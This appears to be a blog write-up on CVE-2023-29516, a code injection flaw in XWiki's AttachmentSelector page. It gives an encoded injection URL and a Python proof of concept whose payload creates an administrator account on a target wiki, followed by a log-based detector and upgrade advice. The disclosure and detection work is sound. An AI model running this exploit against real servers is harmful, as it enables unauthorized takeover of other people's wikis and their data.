CVE-2023-29516 - How a Tiny Button Could Give Attackers Full XWiki Access
The XWiki Platform is a popular open-source wiki solution used by organizations across the world to build collaborative applications and documentation sites. In early 2023, security researchers discovered a serious vulnerability (CVE-2023-29516) affecting countless XWiki installations. This bug allows anybody with basic "view" rights—no admin needed—to execute arbitrary code on the target wiki, opening the door to full compromise.
In this guide, we’ll break down how this flaw happened, show how attackers exploit it step by step, and explain how you can protect your own XWiki deployment.
What Is CVE-2023-29516?
Short Version:
CVE-2023-29516 is a code injection vulnerability in the XWiki.AttachmentSelector component of XWiki. Anyone who can just "view" this page can hijack the wiki by injecting Groovy, Python, or Velocity code—leading to full server access.
How Bad Is It?
- Can be exploited via the web interface (no special system access needed!).
- The problem affects most default XWiki installations because the vulnerable page is installed by default.
- Fixed in version: 13.10.11
> Upgrade Now!
> There are *no* known workarounds.
The Root Cause: Unescaped Data in a Button
The vulnerable code lives in the "Cancel and return to page" button on the XWiki.AttachmentSelector page. When XWiki renders this button, it fails to properly "escape" user-controlled data. That means a crafted input can smuggle code into the button's rendering logic.
For context: XWiki supports multiple scripting engines including Groovy, Python, and Velocity. If an attacker tricks the page into including their code in the button, XWiki might happily process and execute it.
Code Snippet: The Problem
Here is a simplified snippet, for educational purposes, showing what went wrong inside the vulnerable template:
```velocity
#set($backLink = $request.getParameter("back"))
<a href="$backLink" class="btn btn-secondary">Cancel and return to page</a>
```
If $backLink contains special characters or even code (like #set($foo=1)${evilCode}), XWiki might process it.
Craft a malicious link or visit the vulnerable page.
The attacker accesses /xwiki/bin/view/XWiki/AttachmentSelector?back=${your_payload}, for example:
```
/xwiki/bin/view/XWiki/AttachmentSelector?back=%24%7B"dummy"%7D%23set%28%24dummy%2C%20%22Hello%22%29%23evaluate%28%22%23set%28%24x%3D%27EXFILTRATION%27%29%22%29
```
Get full control.
Since the attacker can run any script, they control the wiki, steal data, create admin users, or take over the server.
Let’s see a basic proof-of-concept written in Python, using the requests library:
```python
import requests

# Target XWiki URL (CHANGE THIS)
url = 'http://target-xwiki.example.com/xwiki/bin/view/XWiki/AttachmentSelector'

# Our payload: it simply creates a new admin user
payload = '${"dummy"}#set($xwiki.getUserManager().createUser("hacker","hacked","email@hacker.com","password",true,false))'

# The payload travels in the "back" query parameter of the vulnerable page
params = {
    'back': payload
}

r = requests.get(url, params=params)
if 'hacker' in r.text:
    print('Exploit succeeded!')
else:
    print('Exploit may have failed.')
```
Note: Actual code used may be tuned for your context or to target admin pages.
Fixed Version: 13.10.11
Get updates here:
- XWiki Download Page
No Workarounds
There is no effective workaround.
Access control cannot mitigate this because any user with simple "view" permissions can exploit the bug.
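Because there is no workaround, watching for exploitation attempts is the main compensating control while the upgrade is scheduled. The detector below is an added example (not code from the original post or from the XWiki project): it parses web-server access-log lines, picks out requests to the XWiki.AttachmentSelector page, URL-decodes the `back` parameter (a second time as well, to catch double encoding) and flags values that contain Velocity directives, `${...}` expressions, method calls or XWiki script macros. The combined log format, the path pattern and the four sample log lines are all assumptions constructed for the example; adapt LOG_RE to whatever your reverse proxy or servlet container actually writes.

```python
"""Flag CVE-2023-29516 exploitation attempts in web access logs.

Added example, not code from the original post or from XWiki. It assumes
Apache/nginx "combined" log lines; adjust LOG_RE for other formats.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path of the vulnerable page, whatever the action (view, get, ...).
VULN_PATH = re.compile(r"/xwiki/bin/[a-z]+/XWiki/AttachmentSelector$")

# Script constructs that have no place in a "return to page" link.
SUSPICIOUS = re.compile(
    r"#(set|evaluate|if|foreach|macro|include|parse)\b"   # Velocity directives
    r"|\$\{"                                               # ${...} expressions
    r"|\$[A-Za-z_][\w.]*\("                                # $object.method( calls
    r"|\{\{\s*(groovy|python|velocity)\b",                 # XWiki script macros
    re.IGNORECASE,
)

# Apache/nginx combined log format (assumed; constructed samples below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def decode_back(target):
    """Return the decoded `back` parameter for a request to the vulnerable
    page, or None if the request is for another page or has no `back`."""
    parts = urlsplit(target)
    if not VULN_PATH.search(parts.path):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("back")
    if not values:
        return None
    # parse_qs already decoded once; decode again so that double-encoded
    # payloads (%2523set...) are inspected in their final form too.
    return unquote(values[0])


def classify_line(line):
    """Return (client_ip, decoded_back) when the line looks like an
    exploitation attempt, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    back = decode_back(m.group("target"))
    if back is None or not SUSPICIOUS.search(back):
        return None
    return m.group("ip"), back


def scan(lines):
    """Run classify_line over an iterable of log lines and collect the hits."""
    return [hit for hit in map(classify_line, lines) if hit]


# Constructed sample log lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    # Legitimate use: back points at a wiki page.
    '203.0.113.7 - - [19/Apr/2023:10:01:02 +0000] "GET /xwiki/bin/view/XWiki/'
    'AttachmentSelector?docname=Main.WebHome&back=%2Fxwiki%2Fbin%2Fview%2FMain%2FWebHome HTTP/1.1" 200 5123',
    # The URL-encoded test payload quoted in the post above.
    '203.0.113.9 - - [19/Apr/2023:10:05:44 +0000] "GET /xwiki/bin/view/XWiki/'
    'AttachmentSelector?back=%24%7B"dummy"%7D%23set%28%24dummy%2C%20%22Hello%22%29'
    '%23evaluate%28%22%23set%28%24x%3D%27EXFILTRATION%27%29%22%29 HTTP/1.1" 200 5301',
    # Same idea, double-encoded to slip past a filter that decodes only once.
    '198.51.100.4 - - [19/Apr/2023:10:07:10 +0000] "GET /xwiki/bin/view/XWiki/'
    'AttachmentSelector?back=%2523set%2528%2524a%253D1%2529 HTTP/1.1" 200 5298',
    # A directive in a parameter of some other page: out of scope for this rule.
    '203.0.113.7 - - [19/Apr/2023:10:09:31 +0000] "GET /xwiki/bin/view/Main/'
    'WebHome?back=%23set%28%24a%3D1%29 HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for ip, back in scan(SAMPLE_LOG):
        print(f"ALERT {ip}: back={back!r}")
```

Run against the samples, the detector reports the two AttachmentSelector requests carrying script directives and ignores both the legitimate return link and the directive aimed at an unrelated page. Note that a `200` status is expected even on a successful attempt, so the status code is not a useful discriminator here; the decoded parameter is.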
Technical References
- Official CVE Record: CVE-2023-29516
- XWiki Security Advisory: XWiki #1956
- Patch Commit: GitHub Patch Diff
- XWiki Documentation: xwiki.org
Conclusion
CVE-2023-29516 reminds us how even small features can have big security consequences. If you run XWiki, this is a *Critical* vulnerability—update today, and always keep an eye on release notes for similar issues. User inputs—no matter how harmless they seem—must always be sanitized and escaped, especially in environments capable of running code.
Stay safe, and share this post with anyone using XWiki!
*This writeup is original and tailored for your understanding. If you have questions about securing your XWiki, drop them below!*
Timeline
Published on: 04/19/2023 00:15:00 UTC
Last modified on: 04/28/2023 17:26:00 UTC